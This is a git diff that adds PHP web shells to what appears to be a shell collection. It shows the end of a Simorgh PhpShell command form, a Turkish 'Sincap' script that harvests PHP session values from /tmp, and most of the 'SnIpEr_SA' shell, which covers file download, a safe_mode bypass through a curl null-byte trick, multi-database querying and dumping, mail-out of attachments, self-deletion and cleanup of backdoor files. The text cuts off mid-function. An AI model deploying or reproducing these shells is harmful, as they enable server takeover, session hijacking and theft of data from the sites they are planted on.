+<form name="shell" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="post">
+<div style="width: 900; height: 454">
+<textarea name="output" readonly="readonly" cols="120" rows="20" style="color: #CCFF33; border: 1px dashed #FF0000; background-color: #000000">
+<?php
+$lines = substr_count($_SESSION['output'], "\n");
+$padding = str_repeat("\n", max(0, $_REQUEST['rows']+1 - $lines));
+echo rtrim($padding . $_SESSION['output']);
+?>
+</textarea>
+<p class="prompt" align="justify">
+  cmd:<input class="prompt" name="command" type="text"
+                onkeyup="key(event)" size="60" tabindex="1" style="border: 1px dotted #808080">
+  <input type="submit" value="Enter" /><input type="submit" name="reset" value="Reset" /> Rows: 
+  <input type="text" name="rows" value="<?php echo $_REQUEST['rows'] ?>" size="5" />
+</p>
+<p class="prompt" align="center">
+  <br>
+  <br>
+&nbsp;<font color="#C0C0C0" size="2">Copyright 2004-Simorgh Security<br>
+  Make On PhpShell Kernel<br>
+  <a href="http://www.simorgh-ev.com" style="text-decoration: none">
+  <font color="#C0C0C0">www.simorgh-ev.com</font></a></font></p>
+</div>
+</form>
+
+
+</html>
\ No newline at end of file
diff --git a/138shell/S/Sincap.php.txt b/138shell/S/Sincap.php.txt
new file mode 100644
index 0000000..96ff07a
--- /dev/null
+++ b/138shell/S/Sincap.php.txt
@@ -0,0 +1,124 @@
+<html>
+
+<head>
+<meta http-equiv="Content-Language" content="tr">
+<meta name="GENERATOR" content="Microsoft FrontPage 6.0">
+<meta name="ProgId" content="FrontPage.Editor.Document">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<title>:: AventGrup ::.. - Sincap 1.0 | Session(Oturum) Böceği&nbsp;&nbsp; </title>
+</head>
+
+<body text="#008000" bgcolor="#808080" topmargin="0" leftmargin="0" rightmargin="0" bottommargin="0" marginwidth="0" marginheight="0">
+
+<table border="0" width="100%" id="table1" cellspacing="0" cellpadding="0" height="108">
+	<tr>
+    <td width="70" bgcolor="#000000" height="83">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="83" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup©<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geliştirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    Sincap 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="83" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    <br>
+    </font><br>
+    <font color="#858585" face="Verdana" style="font-size: 8pt">www.aventgrup.net&nbsp;<br>
+    </font></span><a href="mailto:shopen@aventgrup.net">
+	<font face="Verdana" style="font-size: 8pt; text-decoration: none" color="#C0C0C0">
+	info@aventgrup.net</font></a><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  	</tr>
+	<tr>
+    <td width="1002" bgcolor="#484848" height="25" colspan="3">
+    <font color="#E5E5E5" style="font-size: 8pt; font-weight: 700" face="Arial">&nbsp; 
+	Linux Sessin ( Oturum ) Böceği</font></td>
+    </tr>
+</table>
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#800000" width="100%" id="AutoNumber1">
+  <tr>
+    <td width="8%" bgcolor="#B6B6B6">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#000000">&nbsp;S. 
+    No</font></td>
+    <td width="25%" bgcolor="#B6B6B6">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#000000">&nbsp;Oturum 
+    Adı</font></td>
+    <td width="42%" bgcolor="#B6B6B6">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#000000">&nbsp;Oturum 
+    Değeri</font></td>
+    <td width="25%" bgcolor="#B6B6B6">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#000000">&nbsp;Referans</font></td>
+  </tr>
+<tr>
+
+
+<?
+if ($sedat=@opendir("/tmp")){
+while (($ekinci=readdir ($sedat))){
+if (is_file("/tmp/$ekinci")){
+if($ekinci>"sess_"){
+$asortik=$ekinci;
+$baglan=fopen("/tmp/$ekinci",'r');
+while(! feof ( $baglan ) ){
+$okunan=fgets($baglan,1024);
+$toplam="$toplam$okunan";
+} fclose($baglan); 
+};
+?>
+
+
+
+<?
+}}}
+closedir($sedat);
+?>
+
+<?
+$metin=$toplam;
+$i=explode(";",$metin);
+?>
+
+
+
+
+<?
+foreach($i as $yeni){
+$tampon=explode("|",$yeni);
+$deger1= "$tampon[0]";
+$ich=explode(":",$tampon[1]);
+$tampon3=count($ich);
+$tampon4=$tampon3-1;
+$deger2= "$ich[$tampon4]";
+$is++;
+$temizleme=array(
+'"'=>'',
+'v'=>'',
+'c'=>''
+);
+$degerT= strtr($deger2,$temizleme);
+?>
+    <td width="8%" bgcolor="#E5E5E5" align="left" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#000000">&nbsp;<?echo $is;?></font></td>
+    <td width="25%" bgcolor="#E5E5E5" align="left" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#000000">&nbsp;<?echo $deger1;?></font></td>
+    <td width="42%" bgcolor="#E5E5E5" align="left" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#000000">&nbsp;<?echo $degerT;?></font></td>
+    <td width="25%" bgcolor="#E5E5E5" align="left" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#000000">&nbsp;-</td>
+
+</tr>
+<?};?>
+
+</table>
+
+</body>
+
+</html>
+
+
diff --git a/138shell/S/SnIpEr_SA Shell.txt b/138shell/S/SnIpEr_SA Shell.txt
new file mode 100644
index 0000000..a3b75ee
--- /dev/null
+++ b/138shell/S/SnIpEr_SA Shell.txt	
@@ -0,0 +1,2246 @@
+<?php
+/******************************************************************************************************/
+/*                                      #  ##        ##   #
+/*                                    # # ## ###   ##   ## #  #
+/*                                  # ###  ### # ###   ##  ### #
+/*                                #      ##  ######### ##   #
+/*                                          ##########
+/*                                  ###      #########      ###
+/*                                #    ##     #######     ##    #
+/*                                       ##    #####    ##
+/*                                         ##  ####  ##
+/*                                             ####   ##
+/*                                            ######
+/*                                           ## ## ##
+/*                                        @@    ##    @@
+/*                                    @ @@@    ####    @@@ @
+/*                                    @@@     ######    @@@
+/*
+/*
+/*
+/*
+/*
+/*  SnIpEr_SA.php - ?????? ?? ??? ??????????? ??? ????????? ????????? ??????? ?? ??????? ????? ???????
+/*  ?? ?????? ??????? ????? ?????? ?? ????? ?????: http://3asfh.net/
+/*  ??????:
+/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
+/*  ????????? ????????????? ?? ?????? ? ????:  ? ???? ?????? ??.
+/*  ???? ? ??? ???? ?????-???? ???? ?? ?????? ???? ????? ??????? ??????? ???????? ? ?????? ?? ??????
+/*  ?? SnIpEr.SA@hotmail.com ??? ??????????? ????? ???????????.
+/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
+/*  (c)oded by SnIpEr_SA
+/*  MAIL http://rst.void.ru , http://ghc.ru
+/*  ANY MODIFIED REPUBLISHING IS RESTRICTED
+/******************************************************************************************************/
+/* ~~~ ÇáÎíÇÑÇÊ | Options  ~~~ */
+
+// ÇááÛÉ | Language
+// $language='ru' - ??????? (russian)
+// $language='eng' - english (??????????)
+$language='eng';
+
+// ?????????????? | Authentification
+// $auth = 1; - áÊİÚíá ÇáÏÎæá Èßáãå ÇáãÑæÑ  ( authentification = On  )
+// $auth = 0; - áÇíŞÇİ ÇáÏÎæá ÈßáãÉ ÇáãÑæÑ ( authentification = Off )
+$auth = 0;
+
+// áÏÎæá ÈßáãÉ ãÑæÑ æÇÓã ãÓÊÎÏã (Login & Password for access)
+// áÍãÇíÉ ÇáÓßÑÈÊ ãä ÏÎæá ÛíÑß ÛíÑ ÇáÊÇáí!!! (CHANGE THIS!!!)
+// åäÇ æÖÚß ßáãå ÇáãÑæÑ æåí ãÔİÑå ÈÕíÛå md5, æßáãÉÚ ÇáãÑæÑ åäÇ åí  'r57'
+// ÊÓÊÚØíÚ Çä ÊÔİÑ ßáãÉ ãÑæÑß æÇÓã ÇáãÓÊÎÏã ÈÕíÛÉ md5 ææÖÚåÇ İí ÇáÎÇäÇÊ ÇáÊÇáíå
+$name='ec371748dc2da624b35a4f8f685dd122'; // ÇÓã ÇáãÓÊÎÏã  (user login)
+$pass='ec371748dc2da624b35a4f8f685dd122'; // ßáãÉ ÇáãÑæÑ (user password)
+/******************************************************************************************************/
+if(empty($_POST['SnIpEr_SA'])){
+
+} else {
+$m=$_POST['SnIpEr_SA'];
+$ch =
+curl_init("file:///".$m."\x00/../../../../../../../../../../../../".__FILE__);
+curl_exec($ch);
+var_dump(curl_exec($ch));
+
+}
+echo "".htmlspecialchars($m)."";
+error_reporting(0);
+set_magic_quotes_runtime(0);
+@set_time_limit(0);
+@ini_set('max_execution_time',0);
+@ini_set('output_buffering',0);
+$safe_mode = @ini_get('safe_mode');
+$version = '1.31';
+if(version_compare(phpversion(), '4.1.0') == -1)
+ {
+ $_POST   = &$HTTP_POST_VARS;
+ $_GET    = &$HTTP_GET_VARS;
+ $_SERVER = &$HTTP_SERVER_VARS;
+ $_COOKIE = &$HTTP_COOKIE_VARS;
+ }
+if (@get_magic_quotes_gpc())
+ {
+ foreach ($_POST as $k=>$v)
+  {
+  $_POST[$k] = stripslashes($v);
+  }
+ foreach ($_COOKIE as $k=>$v)
+  {
+  $_COOKIE[$k] = stripslashes($v);
+  }
+ }
+
+if($auth == 1) {
+if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
+   {
+   header('WWW-Authenticate: Basic realm="SnIpEr_SA"');
+   header('HTTP/1.0 401 Unauthorized');
+   exit("<b><a href=http://3asfh.net>SnIpEr_SA</a> : Access Denied</b>");
+   }
+}
+$head = '<!-- SnIpEr_SA -->
+<html>
+<head>
+<meta http-equiv="Content-Language" content="ar-sa">
+<meta name="GENERATOR" content="Microsoft FrontPage 6.0">
+<meta name="ProgId" content="FrontPage.Editor.Document">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1256">
+<title>SnIpEr_SA shell</title>
+
+
+
+<STYLE>
+BODY {
+        SCROLLBAR-FACE-COLOR: #800000; SCROLLBAR-HIGHLIGHT-COLOR: #101010; SCROLLBAR-SHADOW-COLOR: #101010; SCROLLBAR-3DLIGHT-COLOR: #101010; SCROLLBAR-ARROW-COLOR: #101010; SCROLLBAR-TRACK-COLOR: #101010; FONT-FAMILY: Verdana; SCROLLBAR-DARKSHADOW-COLOR: #101010
+}
+
+tr {
+BORDER-RIGHT:  #aaaaaa 2px solid;
+BORDER-TOP:    #eeeeee 2px solid;
+BORDER-LEFT:   #eeeeee 2px solid;
+BORDER-BOTTOM: #aaaaaa 2px solid;
+color: #ffffff;
+}
+td {
+BORDER-RIGHT:  #aaaaaa 2px solid;
+BORDER-TOP:    #eeeeee 2px solid;
+BORDER-LEFT:   #eeeeee 2px solid;
+BORDER-BOTTOM: #aaaaaa 2px solid;
+color: #cccccc;
+}
+.table1 {
+BORDER: 1px;
+BACKGROUND-COLOR: #333333;
+color: #333333;
+}
+.td1 {
+BORDER: 1px;
+font: 7pt tahoma;
+color: #ffffff;
+}
+.tr1 {
+BORDER: 1px;
+color: #2279D9;
+}
+table {
+BORDER:  #eeeeee 2px outset;
+BACKGROUND-COLOR: #272727;
+color: #2279D9;
+}
+input {
+BORDER-RIGHT:  #ffffff 2px solid;
+BORDER-TOP:    #999999 2px solid;
+BORDER-LEFT:   #999999 2px solid;
+BORDER-BOTTOM: #ffffff 2px solid;
+BACKGROUND-COLOR: #800000;
+font: 9pt tahoma;
+color: #ffffff;
+}
+select {
+BORDER-RIGHT:  #ffffff 2px solid;
+BORDER-TOP:    #999999 2px solid;
+BORDER-LEFT:   #999999 2px solid;
+BORDER-BOTTOM: #ffffff 2px solid;
+BACKGROUND-COLOR: #000000;
+font: 9pt tahoma;
+color: #CCCCCC;;
+}
+submit {
+BORDER:  buttonhighlight 2px outset;
+BACKGROUND-COLOR: #272727;
+width: 40%;
+color: #2279D9;
+}
+textarea {
+BORDER-RIGHT:  #ffffff 2px solid;
+BORDER-TOP:    #999999 2px solid;
+BORDER-LEFT:   #999999 2px solid;
+BORDER-BOTTOM: #ffffff 2px solid;
+BACKGROUND-COLOR: #3D3D3D;
+font: Fixedsys bold;
+color: #ffffff;
+}
+BODY {
+margin: 2px;
+color: #2279D9;
+background-color: #000000;
+}
+A:link {COLOR:red; TEXT-DECORATION: none}
+A:visited { COLOR:red; TEXT-DECORATION: none}
+A:active {COLOR:red; TEXT-DECORATION: none}
+A:hover {color:blue;TEXT-DECORATION: none}
+</STYLE>
+<script language=\'javascript\'>
+function hide_div(id)
+{
+  document.getElementById(id).style.display = \'none\';
+  document.cookie=id+\'=0;\';
+}
+function show_div(id)
+{
+  document.getElementById(id).style.display = \'block\';
+  document.cookie=id+\'=1;\';
+}
+function change_divst(id)
+{
+  if (document.getElementById(id).style.display == \'none\')
+    show_div(id);
+  else
+    hide_div(id);
+}
+</script>';
+class zipfile
+{
+    var $datasec      = array();
+    var $ctrl_dir     = array();
+    var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
+    var $old_offset   = 0;
+    function unix2DosTime($unixtime = 0) {
+        $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
+        if ($timearray['year'] < 1980) {
+            $timearray['year']    = 1980;
+            $timearray['mon']     = 1;
+            $timearray['mday']    = 1;
+            $timearray['hours']   = 0;
+            $timearray['minutes'] = 0;
+            $timearray['seconds'] = 0;
+        }
+        return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
+                ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
+    }
+    function addFile($data, $name, $time = 0)
+    {
+        $name     = str_replace('\\', '/', $name);
+        $dtime    = dechex($this->unix2DosTime($time));
+        $hexdtime = '\x' . $dtime[6] . $dtime[7]
+                  . '\x' . $dtime[4] . $dtime[5]
+                  . '\x' . $dtime[2] . $dtime[3]
+                  . '\x' . $dtime[0] . $dtime[1];
+        eval('$hexdtime = "' . $hexdtime . '";');
+        $fr   = "\x50\x4b\x03\x04";
+        $fr   .= "\x14\x00";
+        $fr   .= "\x00\x00";
+        $fr   .= "\x08\x00";
+        $fr   .= $hexdtime;
+        $unc_len = strlen($data);
+        $crc     = crc32($data);
+        $zdata   = gzcompress($data);
+        $zdata   = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
+        $c_len   = strlen($zdata);
+        $fr      .= pack('V', $crc);
+        $fr      .= pack('V', $c_len);
+        $fr      .= pack('V', $unc_len);
+        $fr      .= pack('v', strlen($name));
+        $fr      .= pack('v', 0);
+        $fr      .= $name;
+        $fr .= $zdata;
+        $this -> datasec[] = $fr;
+        $cdrec = "\x50\x4b\x01\x02";
+        $cdrec .= "\x00\x00";
+        $cdrec .= "\x14\x00";
+        $cdrec .= "\x00\x00";
+        $cdrec .= "\x08\x00";
+        $cdrec .= $hexdtime;
+        $cdrec .= pack('V', $crc);
+        $cdrec .= pack('V', $c_len);
+        $cdrec .= pack('V', $unc_len);
+        $cdrec .= pack('v', strlen($name) );
+        $cdrec .= pack('v', 0 );
+        $cdrec .= pack('v', 0 );
+        $cdrec .= pack('v', 0 );
+        $cdrec .= pack('v', 0 );
+        $cdrec .= pack('V', 32 );
+        $cdrec .= pack('V', $this -> old_offset );
+        $this -> old_offset += strlen($fr);
+        $cdrec .= $name;
+        $this -> ctrl_dir[] = $cdrec;
+    }
+    function file()
+    {
+        $data    = implode('', $this -> datasec);
+        $ctrldir = implode('', $this -> ctrl_dir);
+        return
+            $data .
+            $ctrldir .
+            $this -> eof_ctrl_dir .
+            pack('v', sizeof($this -> ctrl_dir)) .
+            pack('v', sizeof($this -> ctrl_dir)) .
+            pack('V', strlen($ctrldir)) .
+            pack('V', strlen($data)) .
+            "\x00\x00";
+    }
+}
+function compress(&$filename,&$filedump,$compress)
+ {
+    global $content_encoding;
+    global $mime_type;
+    if ($compress == 'bzip' && @function_exists('bzcompress'))
+     {
+        $filename  .= '.bz2';
+        $mime_type = 'application/x-bzip2';
+        $filedump = bzcompress($filedump);
+     }
+     else if ($compress == 'gzip' && @function_exists('gzencode'))
+     {
+        $filename  .= '.gz';
+        $content_encoding = 'x-gzip';
+        $mime_type = 'application/x-gzip';
+        $filedump = gzencode($filedump);
+     }
+     else if ($compress == 'zip' && @function_exists('gzcompress'))
+     {
+             $filename .= '.zip';
+        $mime_type = 'application/zip';
+        $zipfile = new zipfile();
+        $zipfile -> addFile($filedump, substr($filename, 0, -4));
+        $filedump = $zipfile -> file();
+     }
+     else
+     {
+             $mime_type = 'application/octet-stream';
+     }
+ }
+function mailattach($to,$from,$subj,$attach)
+ {
+ $headers  = "From: $from\r\n";
+ $headers .= "MIME-Version: 1.0\r\n";
+ $headers .= "Content-Type: ".$attach['type'];
+ $headers .= "; name=\"".$attach['name']."\"\r\n";
+ $headers .= "Content-Transfer-Encoding: base64\r\n\r\n";
+ $headers .= chunk_split(base64_encode($attach['content']))."\r\n";
+ if(@mail($to,$subj,"",$headers)) { return 1; }
+ return 0;
+ }
+class my_sql
+ {
+ var $host = 'localhost';
+ var $port = '';
+ var $user = '';
+ var $pass = '';
+ var $base = '';
+ var $db   = '';
+ var $connection;
+ var $res;
+ var $error;
+ var $rows;
+ var $columns;
+ var $num_rows;
+ var $num_fields;
+ var $dump;
+
+ function connect()
+  {
+          switch($this->db)
+     {
+           case 'MySQL':
+            if(empty($this->port)) { $this->port = '3306'; }
+            if(!function_exists('mysql_connect')) return 0;
+            $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);
+            if(is_resource($this->connection)) return 1;
+           break;
+     case 'MSSQL':
+      if(empty($this->port)) { $this->port = '1433'; }
+            if(!function_exists('mssql_connect')) return 0;
+            $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);
+      if($this->connection) return 1;
+     break;
+     case 'PostgreSQL':
+      if(empty($this->port)) { $this->port = '5432'; }
+      $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";
+      if(!function_exists('pg_connect')) return 0;
+      $this->connection = @pg_connect($str);
+      if(is_resource($this->connection)) return 1;
+     break;
+     case 'Oracle':
+      if(!function_exists('ocilogon')) return 0;
+      $this->connection = @ocilogon($this->user, $this->pass, $this->base);
+      if(is_resource($this->connection)) return 1;
+     break;
+     }
+    return 0;
+  }
+
+ function select_db()
+  {
+   switch($this->db)
+    {
+          case 'MySQL':
+           if(@mysql_select_db($this->base,$this->connection)) return 1;
+    break;
+    case 'MSSQL':
+           if(@mssql_select_db($this->base,$this->connection)) return 1;
+    break;
+    case 'PostgreSQL':
+     return 1;
+    break;
+    case 'Oracle':
+     return 1;
+    break;
+    }
+   return 0;
+  }
+
+ function query($query)
+  {
+   $this->res=$this->error='';
+   switch($this->db)
+    {
+          case 'MySQL':
+     if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection)))
+      {
+      $this->error = @mysql_error($this->connection);
+      return 0;
+      }
+     else if(is_resource($this->res)) { return 1; }
+     return 2;
+          break;
+    case 'MSSQL':
+     if(false===($this->res=@mssql_query($query,$this->connection)))
+      {
+      $this->error = 'Query error';
+      return 0;
+      }
+      else if(@mssql_num_rows($this->res) > 0) { return 1; }
+     return 2;
+    break;
+    case 'PostgreSQL':
+     if(false===($this->res=@pg_query($this->connection,$query)))
+      {
+      $this->error = @pg_last_error($this->connection);
+      return 0;
+      }
+      else if(@pg_num_rows($this->res) > 0) { return 1; }
+     return 2;
+    break;
+    case 'Oracle':
+     if(false===($this->res=@ociparse($this->connection,$query)))
+      {
+      $this->error = 'Query parse error';
+      }
+     else
+      {
+      if(@ociexecute($this->res))
+       {
+       if(@ocirowcount($this->res) != 0) return 2;
+       return 1;
+       }
+      $error = @ocierror();
+      $this->error=$error['message'];
+      }
+    break;
+    }
+  return 0;
+  }
+ function get_result()
+  {
+   $this->rows=array();
+   $this->columns=array();
+   $this->num_rows=$this->num_fields=0;
+   switch($this->db)
+    {
+          case 'MySQL':
+           $this->num_rows=@mysql_num_rows($this->res);
+           $this->num_fields=@mysql_num_fields($this->res);
+           while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res)));
+           @mysql_free_result($this->res);
+           if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
+    break;
+    case 'MSSQL':
+           $this->num_rows=@mssql_num_rows($this->res);
+           $this->num_fields=@mssql_num_fields($this->res);
+           while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));
+           @mssql_free_result($this->res);
+           if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;};
+    break;
+    case 'PostgreSQL':
+           $this->num_rows=@pg_num_rows($this->res);
+           $this->num_fields=@pg_num_fields($this->res);
+           while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
+           @pg_free_result($this->res);
+           if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
+    break;
+    case 'Oracle':
+     $this->num_fields=@ocinumcols($this->res);
+     while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;
+     @ocifreestatement($this->res);
+     if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
+    break;
+    }
+   return 0;
+  }
+ function dump($table)
+  {
+   if(empty($table)) return 0;
+   $this->dump=array();
+   $this->dump[0] = '##';
+   $this->dump[1] = '## --------------------------------------- ';
+   $this->dump[2] = '##  Created: '.date ("d/m/Y H:i:s");
+   $this->dump[3] = '## Database: '.$this->base;
+   $this->dump[4] = '##    Table: '.$table;
+   $this->dump[5] = '## --------------------------------------- ';
+   switch($this->db)
+    {
+          case 'MySQL':
+           $this->dump[0] = '## MySQL dump';
+           if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0;
+           if(!$this->get_result()) return 0;
+           $this->dump[] = $this->rows[0]['Create Table'];
+     $this->dump[] = '## --------------------------------------- ';
+           if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0;
+           if(!$this->get_result()) return 0;
+           for($i=0;$i<$this->num_rows;$i++)
+            {
+      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);}
+            $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
+            }
+    break;
+    case 'MSSQL':
+     $this->dump[0] = '## MSSQL dump';
+     if($this->query('SELECT * FROM '.$table)!=1) return 0;
+           if(!$this->get_result()) return 0;
+           for($i=0;$i<$this->num_rows;$i++)
+            {
+      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
+            $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
+            }
+    break;
+    case 'PostgreSQL':
+     $this->dump[0] = '## PostgreSQL dump';
+     if($this->query('SELECT * FROM '.$table)!=1) return 0;
+           if(!$this->get_result()) return 0;
+           for($i=0;$i<$this->num_rows;$i++)
+            {
+      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
+            $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
+            }
+    break;
+    case 'Oracle':
+      $this->dump[0] = '## ORACLE dump';
+      $this->dump[]  = '## under construction';
+    break;
+    default:
+     return 0;
+    break;
+    }
+   return 1;
+  }
+ function close()
+  {
+   switch($this->db)
+    {
+          case 'MySQL':
+           @mysql_close($this->connection);
+    break;
+    case 'MSSQL':
+     @mssql_close($this->connection);
+    break;
+    case 'PostgreSQL':
+     @pg_close($this->connection);
+    break;
+    case 'Oracle':
+     @oci_close($this->connection);
+    break;
+    }
+  }
+ function affected_rows()
+  {
+   switch($this->db)
+    {
+          case 'MySQL':
+           return @mysql_affected_rows($this->res);
+    break;
+    case 'MSSQL':
+     return @mssql_affected_rows($this->res);
+    break;
+    case 'PostgreSQL':
+     return @pg_affected_rows($this->res);
+    break;
+    case 'Oracle':
+     return @ocirowcount($this->res);
+    break;
+    default:
+     return 0;
+    break;
+    }
+  }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name']))
+ {
+  if(!$file=@fopen($_POST['d_name'],"r")) { err(1,$_POST['d_name']); $_POST['cmd']=""; }
+  else
+   {
+    @ob_clean();
+    $filename = @basename($_POST['d_name']);
+    $filedump = @fread($file,@filesize($_POST['d_name']));
+    fclose($file);
+    $content_encoding=$mime_type='';
+    compress($filename,$filedump,$_POST['compress']);
+    if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); }
+    header("Content-type: ".$mime_type);
+    header("Content-disposition: attachment; filename=\"".$filename."\";");
+    echo $filedump;
+    exit();
+   }
+ }
+if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
+if (!empty($_POST['cmd']) && $_POST['cmd']=="db_query")
+ {
+ echo $head;
+ $sql = new my_sql();
+ $sql->db   = $_POST['db'];
+ $sql->host = $_POST['db_server'];
+ $sql->port = $_POST['db_port'];
+ $sql->user = $_POST['mysql_l'];
+ $sql->pass = $_POST['mysql_p'];
+ $sql->base = $_POST['mysql_db'];
+ $querys = @explode(';',$_POST['db_query']);
+ echo '<body bgcolor=#000000>';
+ if(!$sql->connect()) echo "<div align=center><font face=tahoma size=-2 color=red><b>Can't connect to SQL server</b></font></div>";
+  else
+   {
+   if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=tahoma size=-2 color=red><b>Can't select database</b></font></div>";
+   else
+    {
+    foreach($querys as $num=>$query)
+     {
+      if(strlen($query)>5)
+      {
+      echo "<font face=tahoma size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>";
+      switch($sql->query($query))
+       {
+       case '0':
+       echo "<table width=100%><tr><td><font face=tahoma size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>";
+       break;
+       case '1':
+       if($sql->get_result())
+        {
+               echo "<table width=100%>";
+        foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES);
+               $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=tahoma size=-2><b>&nbsp;", $sql->columns);
+        echo "<tr><td bgcolor=#333333><font face=tahoma size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
+        for($i=0;$i<$sql->num_rows;$i++)
+         {
+         foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES);
+         $values = @implode("&nbsp;</font></td><td><font face=tahoma size=-2>&nbsp;",$sql->rows[$i]);
+         echo '<tr><td><font face=tahoma size=-2>&nbsp;'.$values.'&nbsp;</font></td></tr>';
+         }
+        echo "</table>";
+        }
+       break;
+       case '2':
+       $ar = $sql->affected_rows()?($sql->affected_rows()):('0');
+       echo "<table width=100%><tr><td><font face=tahoma size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>";
+       break;
+       }
+      }
+     }
+    }
+   }
+ echo "<br><form name=form method=POST>";
+ echo in('hidden','db',0,$_POST['db']);
+ echo in('hidden','db_server',0,$_POST['db_server']);
+ echo in('hidden','db_port',0,$_POST['db_port']);
+ echo in('hidden','mysql_l',0,$_POST['mysql_l']);
+ echo in('hidden','mysql_p',0,$_POST['mysql_p']);
+ echo in('hidden','mysql_db',0,$_POST['mysql_db']);
+ echo in('hidden','cmd',0,'db_query');
+ echo "<div align=center>";
+ echo "<font face=tahoma size=-2><b>Base: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>";
+ echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>";
+ echo "</form>";
+ echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
+ }
+if(isset($_GET['delete']))
+ {
+   @unlink(__FILE__);
+ }
+if(isset($_GET['tmp']))
+ {
+   @unlink("/tmp/bdpl");
+   @unlink("/tmp/back");
+   @unlink("/tmp/bd");
+   @unlink("/tmp/bd.c");
+   @unlink("/tmp/dp");
+   @unlink("/tmp/dpc");
+   @unlink("/tmp/dpc.c");
+ }
+if(isset($_GET['phpini']))
+{
+echo $head;
+function U_value($value)
+ {
+ if ($value == '') return '<i>no value</i>';
+ if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
+ if ($value === null) return 'NULL';
+ if (@is_object($value)) $value = (array) $value;
+ if (@is_array($value))
+ {
+ @ob_start();
+ print_r($value);
+ $value = @ob_get_contents();
+ @ob_end_clean();
+ }
+ return U_wordwrap((string) $value);
+ }
+function U_wordwrap($str)
+ {
+ $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
